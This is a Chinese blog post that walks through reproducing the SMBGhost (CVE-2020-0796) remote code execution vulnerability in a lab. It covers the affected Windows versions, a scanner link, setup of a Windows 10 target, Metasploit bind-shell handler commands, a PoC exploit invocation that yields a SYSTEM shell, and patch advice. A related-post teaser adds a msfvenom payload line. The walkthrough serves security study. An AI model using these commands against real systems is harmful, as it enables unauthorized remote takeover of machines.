SMBGhost_RCE漏洞(CVE-2020-0796)复现

最新推荐文章于 2024-04-14 09:46:21 发布
最新推荐文章于 2024-04-14 09:46:21 发布
阅读量3.2k 收藏 7
点赞数
分类专栏: web 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45372008/article/details/106980409
版权

  • 漏洞描述

SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。

  • 影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

  • 漏洞检测

使用exe版本(奇安信)检测
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

  • 复现环境

下载windows10靶机,直接拿shell(非蓝屏)版本会有限制,具体我使用的下面这个

ed2k://|file|cn_windows_10_consumer_editions_version_1903_updated_aug_2019_x64_dvd_4c9cbf0b.iso|5306406912|D061699FE76029369A7BEC3622A564BA|/

攻击机kali
靶机win10:192.168.188.177

安装好win10靶机关闭defender防火墙
运行漏洞检测工具,检测到漏洞

在这里插入图片描述

  • 复现过程

漏洞POC:https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796
payload正向监听,监听端口3333(POC默认端口)
kali终端msf执行

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set rhost 192.168.188.177

在这里插入图片描述
kali打开新终端执行POC

python3 exploit.py -ip win10IP

在这里插入图片描述
成功getshell且为system权限
在这里插入图片描述
在这里插入图片描述

设置内存2G,4G都可getshell,未出现蓝屏
内存1G时,出现蓝屏侧面佐证了其原理有关内存
在这里插入图片描述

  • 漏洞修复

更新windows,安装官方补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

越今朝!
关注
专栏目录
Ladon8.5稳定利用SMBGhost CVE-2020-0796
K8哥哥
07-15 266
漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 影响版本 CVE-2
SMBGhost漏洞CVE2020-0796)简单分析
bluebloodye的专栏
06-26 2555
0x00 漏洞描述 3 月 10 日:微软发布安全通告 ADV200005,称 SMBv3 协议在处理某些请求的方式中存在代码执行漏洞,并提供了缓解措施。 3 月 12 日:微软正式发布 CVE-2020-0796 安全通告和漏洞修复补丁。 CVE-2020-0796是Windows 10 1903/1909的新SMB3压缩功能中的错误。 SMB协议版本3.1.1引入了一种功能,即客户端或服务器可以发布压缩功能,并有选择地压缩SMB3消息。 使用此功能协商会话后,客户端或服务器可以选择..
CVE-2020-0796复现
nini_boom的博客
06-09 390
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
SMBGhost:一个SMBRCE幽灵漏洞
KHOST的博客
03-16 599
近日,一个SMB协议漏洞CVE-2020-0796再次炸锅安全圈,有趣的是,刚过去的微软星期二补丁日,补丁列表上面居然没有CVE-2020-0796这个漏洞编号,国外安全研究员直接给他起了个名字叫SMBGhost,还有的叫做CoronaBlue,因为是新冠.. 来龙去脉,我来给你捋一捋。 万恶之源来自思科talos的博客,上面发布了关于例行补丁日修复的漏洞的检测规则。 ...
smbghost永恒之黑复现
weixin_49891807的博客
07-02 1409
SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。 影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows S
探索SMBGhost_RCE_PoC:一种对Windows SMB漏洞的利用工具
gitblog_00073的博客
03-26 314
探索SMBGhost_RCE_PoC:一种对Windows SMB漏洞的利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个开源项目,旨在暴露并测试Windows系统中著名的CVE-2020-0796(也称为SMBGhost漏洞。该漏洞是一个远程代码执行(RCE漏洞,影响了使用Server Message Block (SMBv3) 协议的Windows...
微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796复现
box
06-04 1411
容我先吐槽下 没错又是她——smb,windows的wodow。复现了我一天,踩了各种坑。 一、漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 二、受影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64
CVE-2020-0796漏洞复现
Jinmindong
03-29 816
CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。漏洞危害等级:高。
永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞
曹振国的博客
07-26 2127
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。 Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
CVE-2020-0796(永恒之黑)漏洞复现
m0_73263892的博客
06-30 669
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
SMBghost CVE-2020-0796漏洞复现
qq_55213436的博客
09-19 507
python脚本链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f。工具地址:链接:https://pan.baidu.com/s/1JRcqiTt9EJrF1vFJzVkY_w 提取码:fx6f。工具地址链接:https://pan.baidu.com/s/1_Bffj-G1kA8pSUGH_rCwbQ 提取码:dtso。version1903,镜像下载地址:https://msdn.itellyou.cn/3、反弹shell利用。
探索SMBGhost:一款强大的安全工具,防御SMB漏洞
最新发布
gitblog_00098的博客
04-14 533
探索SMBGhost:一款强大的安全工具,防御SMB漏洞 去发现同类优质开源项目:https://gitcode.com/ 是一个开源项目,旨在帮助系统管理员和网络安全专业人员检测并防御针对Windows SMB(Server Message Block)协议的特定安全漏洞SMB是Windows网络中的重要组件,用于文件共享、打印服务等,但历史上也曾被黑客利用进行恶意攻击,如著名的 WannaC...
CVE-2020-0796 利用SMBGhost进行本地特权升级:Writeup + POC
子曰小玖的博客
04-08 1185
利用SMBGhostCVE-2020-0796)进行本地特权升级:Writeup + POC 介绍 CVE-2020-0796SMBv3.1.1(也称为“ SMBGhost”)的压缩机制中的错误。该错误影响Windows 10版本1903和1909,大约三周前由Microsoft宣布并修补。得知此消息后,我们将浏览所有细节并创建一个快速的POC(概念验证),以演示如何通过引发BSOD(死...
漏洞分析】如何防护SMBGhost漏洞
olga5abl的博客
03-21 3513
SMBGhost漏洞是继永恒之蓝后,又一个蠕虫级RCE漏洞
SMBGhost_RCE漏洞CVE-2020-0796永恒之黑)
开心星人的博客
11-22 254
https://github.com/shengshengli/LadonGo/blob/main/smb/SmbGhost.go微调了下得到下面的代码。但https://github.com/ly4k/SMBGhost/blob/master/scanner.py仍然显示漏洞,所以这个poc是有问题的。https://github.com/chompie1337/SMBGhost_RCE_PoC 漏洞利用的exp。测试了靶机和本机,结果均正确。
Windows 10 SMBGhost漏洞RCE PoC公布
systemino的博客
05-14 916
SMBGhostCVE-2020-0796漏洞是3月份微软补丁日意外泄露的一个安全漏洞漏洞是Microsoft Server Message Block 3.1.1 (SMBv3)通信协议中发现的一个缓冲区溢出漏洞。是由于SMBv3在处理精心伪造的恶意压缩数据包时发生错误引起的。未经认证的远程攻击者可以利用该漏洞在应用程序的上下文环境中执行任意代码。漏洞影响运行Windows 10版本19...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值